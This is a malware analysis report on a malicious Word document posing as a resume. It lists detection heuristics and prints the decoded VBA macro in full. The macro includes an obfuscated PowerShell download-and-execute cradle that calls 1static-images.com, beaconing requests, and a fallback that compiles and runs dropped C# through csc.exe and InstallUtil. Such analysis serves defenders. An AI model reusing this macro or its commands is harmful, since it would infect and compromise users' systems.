Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3778737d251d8faf…

MALICIOUS

Office (OLE)

1.25 MB Created: 2018-05-04 10:16:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 68cee0aa77911b98d7cdf22e177c05d8 SHA-1: d453439358ffdd5944ed65b8fd38381ea77a294f SHA-256: 3778737d251d8faff9386d8cf18fcdc25ad392b6f9ea9ed3baaf66bb96d54988
550 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains a Document_Open VBA macro that utilizes WScript.Shell and CreateObject to execute obfuscated commands. The macro is designed to download and run a second-stage payload from a remote URL, as indicated by the 'Obfuscated VBA Shell command with URL' heuristic. The presence of PowerShell and VirtualAlloc API references further suggests malicious execution capabilities. The document body itself appears to be a resume, likely used as a lure to entice the user to open the malicious document.

Heuristics 14

  • ClamAV: Doc.Dropper.Agent-6529908-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6529908-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    R = uhiDyWTjmxtDKgGmmlbybCSOLPzjjaxGdEYbiTeehePAfUndKDHpSubqwbGtPmcseoYEZbdosycJOoGJMpTOBrqfbNTQ + " -w 1 /C "" &( $env:pUBlic[13]+$Env:PuBlic[5]+\""x\"")( (\""I\""+\""EX((n\""+\""ew-obj\""+\""e\""+\""ct\""+\"" net.webc\""+\""lien\""+\""t)\""+\"".dow\""+\""nloadstr\""+\""ing(\""+\""B8Qh\""+\""ttp://1static-im\""+\""ag\""+\""es.\""+\""com/s\""+\""uppor\""+\""t/\""+\""B8Q\""+\""))\"").rePlace(\""B8Q\"",[stRIng][CHaR]39) )"""
Shell R, 0
End Sub
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim obj As Object
Set obj = CreateObject("WScript.Shell")
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    imians = "csc.exe /unsafe /out:""" & border & "\" & "package.exe"" "
heading = "InstallUtil.exe /logtoconsole=false /logfile= /U """ & border & "\package.exe"""
T = location_pw & imians & """" & out & """"
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    R = uhiDyWTjmxtDKgGmmlbybCSOLPzjjaxGdEYbiTeehePAfUndKDHpSubqwbGtPmcseoYEZbdosycJOoGJMpTOBrqfbNTQ + " -w 1 /C "" &( $env:pUBlic[13]+$Env:PuBlic[5]+\""x\"")( (\""I\""+\""EX((n\""+\""ew-obj\""+\""e\""+\""ct\""+\"" net.webc\""+\""lien\""+\""t)\""+\"".dow\""+\""nloadstr\""+\""ing(\""+\""B8Qh\""+\""ttp://1static-im\""+\""ag\""+\""es.\""+\""com/s\""+\""uppor\""+\""t/\""+\""B8Q\""+\""))\"").rePlace(\""B8Q\"",[stRIng][CHaR]39) )"""
Shell R, 0
End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim Http
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
If Http Is Nothing Then Set Http = CreateObject("WinHttp.WinHttpRequest")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Sub Document_Open()
EventOnOpen
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.michellebaxter.com/cvprofile.png Referenced by macro
    • http://www.michellebaxter.com/profile.pngReferenced by macro
    • http://ns.1static-images.com/profile.png�Referenced by macro
    • http://ns.1static-images.com/profile.pngReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4317 bytes
SHA-256: 47c5ea6c002e06a1b10c2cf2cebfc431269cb96447c60949bcb5614810f067ee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
EventOnOpen
End Sub

Sub Document_Close()
EventOnClose
End Sub

Public Sub EventOnOpen()

ActiveDocument.Unprotect Password:="password"

ShowContent

EventWait

Track
'WriteFileContentAndRun

End Sub

Public Sub EventOnClose()

HideContent

ActiveDocument.Protect Password:="password", NoReset:=True, Type:= _
wdAllowOnlyReading, UseIRM:=False, EnforceStyleLock:=False

ActiveDocument.Save
 
End Sub

Private Sub ShowContent()
ActiveDocument.Tables(1).Range.Font.Hidden = False
ActiveDocument.Tables(2).Range.Font.Hidden = True
End Sub

Private Sub HideContent()
ActiveDocument.Tables(1).Range.Font.Hidden = True
ActiveDocument.Tables(2).Range.Font.Hidden = False
End Sub

Function FileExists(ByVal FileToTest As String) As Boolean
FileExists = (Dir(FileToTest) <> "")
End Function

Sub DeleteFile(ByVal FileToDelete As String)
If FileExists(FileToDelete) Then
SetAttr FileToDelete, vbNormal
Kill FileToDelete
End If
End Sub

Private Sub EventWait()
Dim AvILoveYou
AvILoveYou = DateAdd("s", 2, Now())
Dim i
i = 0
Do Until (Now() > AvILoveYou)

If ActiveDocument.Shapes.Count > 0 Then
k = ActiveDocument.Shapes.Count
For Index = 1 To k - 1
' do nothing
Next Index
End If
Loop
End Sub

Private Sub Track()
On Error GoTo Dns
Dim Http
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
If Http Is Nothing Then Set Http = CreateObject("WinHttp.WinHttpRequest")
If Http Is Nothing Then Set Http = CreateObject("MSXML2.ServerXMLHTTP")
If Http Is Nothing Then Set Http = CreateObject("Microsoft.XMLHTTP")
Http.Open "GET", "http://www.michellebaxter.com/profile.png", False
Http.Send
Http.Open "GET", "http://ns.1static-images.com/profile.png", False
Http.Send

Http: Oneliner
Exit Sub

Dns: WriteFileContentAndRun


End Sub


Private Sub Oneliner()
wcHmZZVmEnETxCUBVwZXevnOVae = "pow"
PMzqbMwFcachvmluYwwwhkfBFJdDiXwkjWryDHcViQnvXMrKkCsXZRsLZxPNXHUpUoofiv = "ersh"
rYAkgYIgTyjzWsOVfHmmiWBkafJSzfaaENblYLYofvuJzO = "ell"
uhiDyWTjmxtDKgGmmlbybCSOLPzjjaxGdEYbiTeehePAfUndKDHpSubqwbGtPmcseoYEZbdosycJOoGJMpTOBrqfbNTQ = (wcHmZZVmEnETxCUBVwZXevnOVae + PMzqbMwFcachvmluYwwwhkfBFJdDiXwkjWryDHcViQnvXMrKkCsXZRsLZxPNXHUpUoofiv + rYAkgYIgTyjzWsOVfHmmiWBkafJSzfaaENblYLYofvuJzO)
R = uhiDyWTjmxtDKgGmmlbybCSOLPzjjaxGdEYbiTeehePAfUndKDHpSubqwbGtPmcseoYEZbdosycJOoGJMpTOBrqfbNTQ + " -w 1 /C "" &( $env:pUBlic[13]+$Env:PuBlic[5]+\""x\"")( (\""I\""+\""EX((n\""+\""ew-obj\""+\""e\""+\""ct\""+\"" net.webc\""+\""lien\""+\""t)\""+\"".dow\""+\""nloadstr\""+\""ing(\""+\""B8Qh\""+\""ttp://1static-im\""+\""ag\""+\""es.\""+\""com/s\""+\""uppor\""+\""t/\""+\""B8Q\""+\""))\"").rePlace(\""B8Q\"",[stRIng][CHaR]39) )"""
Shell R, 0
End Sub

Private Sub WriteFileContentAndRun()

Dim textbox, text
Dim business As String
Dim location_pw As String

business = "C:\Windows\Microsoft.NET\Framework\"
If FileExists(business & "v4.0.30319\csc.exe") Then
location_pw = business & "v4.0.30319\"
Else
' try something else
Exit Sub
End If

Set textbox = ActiveDocument.Shapes("Text Box 31")
If Not (textbox Is Nothing) Then
text = textbox.TextFrame.TextRange.text
Else
Exit Sub
End If

Dim obj As Object
Set obj = CreateObject("WScript.Shell")

Dim objFolders As Object
Set objFolders = obj.SpecialFolders

Dim out
Dim border
border = objFolders("mydocuments")
out = border & "\" & "package.cs"

Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(out)
oFile.WriteLine text
oFile.Close
Set fso = Nothing
Set oFile = Nothing
       
Dim cm As String
Dim b As String
b = "a*"
Dim imians As String
Dim heading As String
imians = "csc.exe /unsafe /out:""" & border & "\" & "package.exe"" "
heading = "InstallUtil.exe /logtoconsole=false /logfile= /U """ & border & "\package.exe"""
T = location_pw & imians & """" & out & """"
Q = location_pw & heading

Shell T, 0
EventWait

Shell Q, 0
EventWait

DeleteFile (out)

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.